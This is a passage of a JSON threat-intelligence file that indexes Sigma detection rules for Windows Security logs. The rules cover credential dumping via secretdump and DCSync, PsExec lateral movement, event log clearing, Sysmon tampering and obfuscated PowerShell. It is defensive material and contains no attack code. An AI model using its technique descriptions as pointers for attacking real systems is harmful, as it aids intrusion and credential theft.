"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_hybridconnectionmgr_svc_installation.yml" ], "tags": [ "attack.persistence", "attack.t1554" ] }, "related": [ { "dest-uuid": "960c3c86-1480-4d72-b4e0-8c242e84a5c5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0ee4d8a5-4e67-4faf-acfa-62a78457d1f2", "value": "HybridConnectionManager Service Installation" }, { "description": "Detects potential attempts made to set the Directory Services Restore Mode administrator password.\nThe Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers.\nAttackers may change the password in order to obtain persistence.\n", "meta": { "author": "Thomas Patzke", "creation_date": "2017-02-19", "falsepositive": [ "Initial installation of a domain controller." ], "filename": "win_security_susp_dsrm_password_change.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4794", "https://adsecurity.org/?p=1714", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_dsrm_password_change.yml" ], "tags": [ "attack.persistence", "attack.t1098" ] }, "related": [ { "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "53ad8e36-f573-46bf-97e4-15ba5bf4bb51", "value": "Password Change on Directory Service Restore Mode (DSRM) Account" }, { "description": "Detect AD credential dumping using impacket secretdump HKTL", "meta": { "author": "Samir Bousseaden, wagga", "creation_date": "2019-04-03", "falsepositive": [ "Unknown" ], "filename": "win_security_impacket_secretdump.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20230329153811/https://blog.menasec.net/2019/02/threat-huting-10-impacketsecretdump.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_impacket_secretdump.yml" ], "tags": [ "attack.credential-access", "attack.t1003.002", "attack.t1003.004", "attack.t1003.003" ] }, "related": [ { "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "1ecfdab8-7d59-4c98-95d4-dc41970f57fc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "252902e3-5830-4cf6-bf21-c22083dfd5cf", "value": "Possible Impacket SecretDump Remote Activity" }, { "description": "One of the Windows Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-01-10", "falsepositive": [ "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", "System provisioning (system reset before the golden image creation)" ], "filename": "win_security_audit_log_cleared.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/deviouspolack/status/832535435960209408", "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100", "https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/SecurityEventLogCleared.yaml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_audit_log_cleared.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070.001", "car.2016-04-002" ] }, "related": [ { "dest-uuid": "6495ae23-3ab4-43c5-a94f-5638a2c31fd2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d99b79d2-0a6f-4f46-ad8b-260b6e17f982", "value": "Security Eventlog Cleared" }, { "description": "Potential threat actor tampering with Sysmon manifest and eventually disabling it", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2020-07-14", "falsepositive": [ "Unknown" ], "filename": "win_security_sysmon_channel_reference_deletion.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://securityjosh.github.io/2020/04/23/Mute-Sysmon.html", "https://twitter.com/SecurityJosh/status/1283027365770276866", "https://gist.github.com/Cyb3rWard0g/cf08c38c61f7e46e8404b38201ca01c8", "https://twitter.com/Flangvik/status/1283054508084473861", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_sysmon_channel_reference_deletion.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "18beca67-ab3e-4ee3-ba7a-a46ca8d7d0cc", "value": "Sysmon Channel Reference Deletion" }, { "description": "detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one", "meta": { "author": "Samir Bousseaden", "creation_date": "2019-04-03", "falsepositive": [ "Unknown" ], "filename": "win_security_susp_psexec.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20230329171218/https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_psexec.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.002" ] }, "related": [ { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c462f537-a1e3-41a6-b5fc-b2c2cef9bf82", "value": "Suspicious PsExec Execution" }, { "description": "Detects external disk drives or plugged-in USB devices.", "meta": { "author": "Keith Wright", "creation_date": "2019-11-20", "falsepositive": [ "Likely" ], "filename": "win_security_external_device.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-6416", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_external_device.yml" ], "tags": [ "attack.t1091", "attack.t1200", "attack.lateral-movement", "attack.initial-access" ] }, "related": [ { "dest-uuid": "3b744087-9945-4a6f-91e8-9dbceda417a4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "d40239b3-05ff-46d8-9bdd-b46d13463ef9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f69a87ea-955e-4fb4-adb2-bb9fd6685632", "value": "External Disk Drive Or USB Storage Device Was Recognized By The System" }, { "description": "Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials.", "meta": { "author": "Roberto Rodriguez @Cyb3rWard0g", "creation_date": "2019-07-26", "falsepositive": [ "Unknown" ], "filename": "win_security_ad_replication_non_machine_account.yml", "level": "critical", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://threathunterplaybook.com/hunts/windows/180815-ADObjectAccessReplication/notebook.html", "https://threathunterplaybook.com/hunts/windows/190101-ADModDirectoryReplication/notebook.html", "https://threathunterplaybook.com/library/windows/active_directory_replication.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_ad_replication_non_machine_account.yml" ], "tags": [ "attack.credential-access", "attack.t1003.006" ] }, "related": [ { "dest-uuid": "f303a39a-6255-4b89-aecc-18c4d8ca7163", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "17d619c1-e020-4347-957e-1d1207455c93", "value": "Active Directory Replication from Non Machine Account" }, { "description": "Detects the creation or removal of a computer. Can be used to detect attacks such as DCShadow via the creation of a new SPN.", "meta": { "author": "frack113", "creation_date": "2022-10-14", "falsepositive": [ "Unknown" ], "filename": "win_security_add_remove_computer.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4743", "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4741", "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_add_remove_computer.yml" ], "tags": [ "attack.defense-evasion", "attack.t1207" ] }, "related": [ { "dest-uuid": "564998d8-ab3e-4123-93fb-eccaa6b9714a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "20d96d95-5a20-4cf1-a483-f3bda8a7c037", "value": "Add or Remove Computer from DC" }, { "description": "Detects \"read access\" requests on the services registry key.\nAdversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\nAdversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts.\n", "meta": { "author": "Center for Threat Informed Defense (CTID) Summiting the Pyramid Team", "creation_date": "2023-09-28", "falsepositive": [ "Likely from legitimate applications reading their key. Requires heavy tuning" ], "filename": "win_security_registry_permissions_weakness_check.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-1---service-registry-permissions-weakness", "https://center-for-threat-informed-defense.github.io/summiting-the-pyramid/analytics/service_registry_permissions_weakness_check/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_registry_permissions_weakness_check.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.privilege-escalation", "attack.t1574.011" ] }, "related": [ { "dest-uuid": "17cc750b-e95b-4d7d-9dde-49e0de24148c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "11d00fff-5dc3-428c-8184-801f292faec0", "value": "Service Registry Key Read Access Request" }, { "description": "Detects anyone attempting a backup for the DPAPI Master Key. This events gets generated at the source and not the Domain Controller.", "meta": { "author": "Roberto Rodriguez @Cyb3rWard0g", "creation_date": "2019-08-10", "falsepositive": [ "If a computer is a member of a domain, DPAPI has a backup mechanism to allow unprotection of the data. Which will trigger this event." ], "filename": "win_security_dpapi_domain_masterkey_backup_attempt.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://threathunterplaybook.com/hunts/windows/190620-DomainDPAPIBackupKeyExtraction/notebook.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dpapi_domain_masterkey_backup_attempt.yml" ], "tags": [ "attack.credential-access", "attack.t1003.004" ] }, "related": [ { "dest-uuid": "1ecfdab8-7d59-4c98-95d4-dc41970f57fc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "39a94fd1-8c9a-4ff6-bf22-c058762f8014", "value": "DPAPI Domain Master Key Backup Attempt" }, { "description": "Detects a threat actor creating a file named `iertutil.dll` in the `C:\\Program Files\\Internet Explorer\\` directory over the network for a DCOM InternetExplorer DLL Hijack scenario.", "meta": { "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", "creation_date": "2020-10-12", "falsepositive": [ "Unknown" ], "filename": "win_security_dcom_iertutil_dll_hijack.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://threathunterplaybook.com/hunts/windows/201009-RemoteDCOMIErtUtilDLLHijack/notebook.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dcom_iertutil_dll_hijack.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.002", "attack.t1021.003" ] }, "related": [ { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "68a0c5ed-bee2-4513-830d-5b0d650139bd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c39f0c81-7348-4965-ab27-2fde35a1b641", "value": "DCOM InternetExplorer.Application Iertutil DLL Hijack - Security" }, { "description": "Detects the extraction of password protected ZIP archives with suspicious file names. See the filename variable for more details on which file has been opened.", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-05-09", "falsepositive": [ "Legitimate used of encrypted ZIP files" ], "filename": "win_security_susp_opened_encrypted_zip_filename.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/sbousseaden/status/1523383197513379841", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip_filename.yml" ], "tags": [ "attack.command-and-control", "attack.defense-evasion", "attack.t1027", "attack.t1105", "attack.t1036" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "54f0434b-726f-48a1-b2aa-067df14516e4", "value": "Password Protected ZIP File Opened (Suspicious Filenames)" }, { "description": "Detects remote task creation via at.exe or API interacting with ATSVC namedpipe", "meta": { "author": "Samir Bousseaden", "creation_date": "2019-04-03", "falsepositive": [ "Unknown" ], "filename": "win_security_atsvc_task.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20230409194125/https://blog.menasec.net/2019/03/threat-hunting-25-scheduled-tasks-for.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_atsvc_task.yml" ], "tags": [ "attack.lateral-movement", "attack.persistence", "car.2013-05-004", "car.2015-04-001", "attack.t1053.002" ] }, "related": [ { "dest-uuid": "f3d95a1f-bba2-44ce-9af7-37866cd63fd0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f6de6525-4509-495a-8a82-1f8b0ed73a00", "value": "Remote Task Creation via ATSVC Named Pipe" }, { "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", "meta": { "author": "Jonathan Cheong, oscd.community", "creation_date": "2020-10-13", "falsepositive": [ "Unknown" ], "filename": "win_security_invoke_obfuscation_clip_services_security.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_clip_services_security.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4edf51e1-cb83-4e1a-bc39-800e396068e3", "value": "Invoke-Obfuscation CLIP+ Launcher - Security" }, { "description": "Detects potential use of Rubeus via registered new trusted logon process", "meta": { "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", "creation_date": "2019-10-24", "falsepositive": [ "Unknown" ], "filename": "win_security_register_new_logon_process_by_rubeus.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_register_new_logon_process_by_rubeus.yml" ], "tags": [ "attack.lateral-movement", "attack.privilege-escalation", "attack.t1558.003" ] }, "related": [ { "dest-uuid": "f2877f7f-9a4c-4251-879f-1224e3006bee", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "12e6d621-194f-4f59-90cc-1959e21e69f7", "value": "Register new Logon Process by Rubeus" }, { "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", "meta": { "author": "Timur Zinniatullin, oscd.community", "creation_date": "2020-10-18", "falsepositive": [ "Unknown" ], "filename": "win_security_invoke_obfuscation_via_compress_services_security.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_compress_services_security.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7a922f1b-2635-4d6c-91ef-af228b198ad3", "value": "Invoke-Obfuscation COMPRESS OBFUSCATION - Security" }, { "description": "Detects the creation of suspicious accounts similar to ANONYMOUS LOGON, such as using additional spaces. Created as an covering detection for exclusion of Logon Type 3 from ANONYMOUS LOGON accounts.", "meta": { "author": "James Pemberton / @4A616D6573", "creation_date": "2019-10-31", "falsepositive": [ "Unknown" ], "filename": "win_security_susp_local_anon_logon_created.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/SBousseaden/status/1189469425482829824", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_local_anon_logon_created.yml" ], "tags": [ "attack.persistence", "attack.t1136.001", "attack.t1136.002" ] }, "related": [ { "dest-uuid": "635cbe30-392d-4e27-978e-66774357c762", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "7610cada-1499-41a4-b3dd-46467b68d177", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1bbf25b9-8038-4154-a50b-118f2a32be27", "value": "Suspicious Windows ANONYMOUS LOGON Local Account Created" }, { "description": "Detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies.", "meta": { "author": "xknow @xknow_infosec", "creation_date": "2019-03-24", "falsepositive": [ "Companies, who may use these default LDAP-Attributes for personal information" ], "filename": "win_security_susp_ldap_dataexchange.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/fox-it/LDAPFragger", "https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961", "https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_ldap_dataexchange.yml" ], "tags": [ "attack.t1001.003", "attack.command-and-control" ] }, "related": [ { "dest-uuid": "c325b232-d5bc-4dde-a3ec-71f3db9e8adc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d00a9a72-2c09-4459-ad03-5e0a23351e36", "value": "Suspicious LDAP-Attributes Used" }, { "description": "This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g AD FS).\nInformation from AD Health service agents can be used to potentially abuse some of the features provided by those services in the cloud (e.g. Federation).\nThis detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM:\\SOFTWARE\\Microsoft\\ADHealthAgent.\nMake sure you set the SACL to propagate to its sub-keys.\n", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", "creation_date": "2021-08-26", "falsepositive": [ "Unknown" ], "filename": "win_security_aadhealth_svc_agent_regkey_access.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://o365blog.com/post/hybridhealthagent/", "https://github.com/OTRF/Set-AuditRule/blob/c3dec5443414231714d850565d364ca73475ade5/rules/registry/aad_connect_health_service_agent.yml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_aadhealth_svc_agent_regkey_access.yml" ], "tags": [ "attack.discovery", "attack.t1012" ] }, "related": [ { "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1d2ab8ac-1a01-423b-9c39-001510eae8e8", "value": "Azure AD Health Service Agents Registry Keys Access" }, { "description": "Transferring files with well-known filenames (sensitive files with credential data) using network shares", "meta": { "author": "Teymur Kheirkhabarov, oscd.community", "creation_date": "2019-10-22", "falsepositive": [ "Transferring sensitive files for legitimate administration work by legitimate administrator" ], "filename": "win_security_transf_files_with_cred_data_via_network_shares.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_transf_files_with_cred_data_via_network_shares.yml" ], "tags": [ "attack.credential-access", "attack.t1003.002", "attack.t1003.001", "attack.t1003.003" ] }, "related": [ { "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "910ab938-668b-401b-b08c-b596e80fdca5", "value": "Transferring Files with Credential Data via Network Shares" }, { "description": "Detects when a Windows Defender exclusion has been deleted. This could indicate an attacker trying to delete their tracks by removing the added exclusions\n", "meta": { "author": "@BarryShooshooga", "creation_date": "2019-10-26", "falsepositive": [ "Unknown" ], "filename": "win_security_windows_defender_exclusions_write_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_windows_defender_exclusions_write_deleted.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a33f8808-2812-4373-ae95-8cfb82134978", "value": "Windows Defender Exclusion Deleted" }, { "description": "Addition of domains is seldom and should be verified for legitimacy.", "meta": { "author": "Thomas Patzke", "creation_date": "2019-12-03", "falsepositive": [ "Legitimate extension of domain structure" ], "filename": "win_security_susp_add_domain_trust.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4706", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_add_domain_trust.yml" ], "tags": [ "attack.persistence", "attack.t1098" ] }, "related": [ { "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0255a820-e564-4e40-af2b-6ac61160335c", "value": "A New Trust Was Created To A Domain" }, { "description": "Detects well-known credential dumping tools execution via service execution events", "meta": { "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "creation_date": "2017-03-05", "falsepositive": [ "Legitimate Administrator using credential dumping tool for password recovery" ], "filename": "win_security_mal_creddumper.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_mal_creddumper.yml" ], "tags": [ "attack.credential-access", "attack.execution", "attack.t1003.001", "attack.t1003.002", "attack.t1003.004", "attack.t1003.005", "attack.t1003.006", "attack.t1569.002", "attack.s0005" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "1ecfdab8-7d59-4c98-95d4-dc41970f57fc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "6add2ab5-2711-4e9d-87c8-7a0be8531530", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f303a39a-6255-4b89-aecc-18c4d8ca7163", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f0d1feba-4344-4ca9-8121-a6c97bd6df52", "value": "Credential Dumping Tools Service Execution - Security" }, { "description": "Detects the registration of the security event source VSSAudit. It would usually trigger when volume shadow copy operations happen.", "meta": { "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", "creation_date": "2020-10-20", "falsepositive": [ "Legitimate use of VSSVC. Maybe backup operations. It would usually be done by C:\\Windows\\System32\\VSSVC.exe." ], "filename": "win_security_vssaudit_secevent_source_registration.yml", "level": "informational", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_vssaudit_secevent_source_registration.yml" ], "tags": [ "attack.credential-access", "attack.t1003.002" ] }, "related": [ { "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e9faba72-4974-4ab2-a4c5-46e25ad59e9b", "value": "VSSAudit Security Event Source Registration" }, { "description": "Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation", "meta": { "author": "Bartlomiej Czyz, Relativity", "creation_date": "2021-01-21", "falsepositive": [ "Possible, different agents with a 8 character binary and a 4, 8 or 16 character service name" ], "filename": "win_security_metasploit_or_impacket_smb_psexec_service_install.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://bczyz1.github.io/2021/01/30/psexec.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_metasploit_or_impacket_smb_psexec_service_install.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.002", "attack.t1570", "attack.execution", "attack.t1569.002" ] }, "related": [ { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "bf90d72c-c00b-45e3-b3aa-68560560d4c5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6fb63b40-e02a-403e-9ffd-3bcc1d749442", "value": "Metasploit Or Impacket Service Installation Via SMB PsExec" }, { "description": "Detects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects.", "meta": { "author": "@neu5ron", "creation_date": "2017-07-30", "falsepositive": [ "Unknown" ], "filename": "win_security_alert_active_directory_user_control.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_active_directory_user_control.yml" ], "tags": [ "attack.persistence", "attack.t1098" ] }, "related": [ { "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "311b6ce2-7890-4383-a8c2-663a9f6b43cd", "value": "Enabled User Right in AD to Control User Objects" }, { "description": "Detects Mimikatz DC sync security events", "meta": { "author": "Benjamin Delpy, Florian Roth (Nextron Systems), Scott Dermott, Sorina Ionescu", "creation_date": "2018-06-03", "falsepositive": [ "Valid DC Sync that is not covered by the filters; please report", "Local Domain Admin account used for Azure AD Connect" ], "filename": "win_security_dcsync.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/gentilkiwi/status/1003236624925413376", "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4662", 